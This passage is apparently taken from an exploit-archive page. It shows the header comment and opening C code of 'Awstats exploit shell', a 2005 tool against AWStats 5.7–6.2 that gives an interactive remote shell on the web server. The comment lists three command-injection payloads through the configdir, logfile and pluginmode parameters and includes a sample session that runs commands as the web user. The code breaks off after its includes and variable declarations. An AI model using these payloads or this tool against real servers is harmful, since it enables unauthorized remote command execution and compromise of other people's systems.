1 /*
2 * Awstats exploit "shell"
3 * code by omin0us
4 * omin0us208 [at] gmail [dot] com
5 * dtors security group
6 * .:( http://dtors.ath.cx ):.
7 *
8 * Vulnerability reported by iDEFENSE
9 * pluginmode bug has been found by GHC team.
10 *
11 * The awstats exploit that was discovered allows
12 * a user to execute arbitrary commands on the
13 * remote server with the privileges of the httpd
14 *
15 * This exploit combines all three methods of exploitation
16 * and acts as a remote "shell", parsing all returned
17 * data to display command output and running in a loop
18 * for continuous access.
19 *
20 * bash−2.05b$ awstats_shell localhost
21 * Awstats 5.7 − 6.2 exploit Shell 0.1
22 * code by omin0us
23 * dtors security group
24 * .: http://dtors.ath.cx :.
25 * −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
26 * select exploit method:
27 * 1. ?configdir=|cmd}
28 * 2. ?update=1&logfile=|cmd|
29 * 3. ?pluginmode=:system("cmd");
30 *
31 * method [1/2/3]? 1
32 * starting shell...
33 * (ctrl+c to exit)
34 * sh3ll> id
35 * uid=80(www) gid=80(www) groups=80(www)
36 * DTORS_STOP
37 * sh3ll> uname −a
38 *
39 * FreeBSD omin0us.dtors.ath.cx 4.8−RELEASE FreeBSD 4.8−RELEASE #3: Mon Oct 11
40 * 19:34:01 EDT 2004 omin0us@localhost:/usr/src/sys/compile/DTORS i386
41 * DTORS_STOP
42 * sh3ll>
43 *
44 * this is licensed under the GPL
45 */
46
47 #include <stdio.h>
48 #include <stdlib.h>
49 #include <string.h>
50 #include <unistd.h>
51 #include <sys/types.h>
52 #include <sys/socket.h>
Page 1/5
AWStats 5.7 6.2 Multiple Remote Exploit extra
omin0us
03/02/2005
53 #include <netinet/in.h>
54 #include <netdb.h>
55
56 #define PORT 80
57 #define CMD_BUFFER 512
58 #define IN_BUFFER 10000
59 #define MAGIC_START "DTORS_START"
60 #define MAGIC_STOP "DTORS_STOP"
61
62 void usage(char *argv[]);
63
64 int main(int argc, char *argv[]){
65
66
FILE *output;
67
int sockfd;
68
struct sockaddr_in addr;
69
struct hostent *host;
70
char *host_name=NUL